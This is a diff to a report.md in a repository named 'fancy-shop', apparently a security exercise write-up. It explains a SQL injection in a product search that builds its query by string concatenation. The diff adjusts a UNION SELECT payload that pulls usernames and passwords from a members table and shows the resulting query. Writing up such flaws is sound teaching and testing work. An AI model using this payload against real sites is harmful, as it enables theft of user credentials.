Stamcor/fancy-shop/report.md

 SELECT * FROM products WHERE hidden = 0 AND name LIKE '%car%'
 ```

 The search string is not correctly sanitised but inserted using simple string concatenation.
-Therefore you can use a search term like `' UNION SELECT null, username, password, null FROM members; -- x` to get a query that looks like this:
+Therefore you can use a search term like `' UNION SELECT null, username, password, null, null, null FROM members; -- x` to get a query that looks like this:

 ```
-SELECT * FROM products WHERE hidden = 0 AND name LIKE '%' UNION SELECT null, username, password, null FROM members; -- x%'
+SELECT * FROM products WHERE hidden = 0 AND name LIKE '%' UNION SELECT null, username, password, null, null, null FROM members; -- x%'
 ```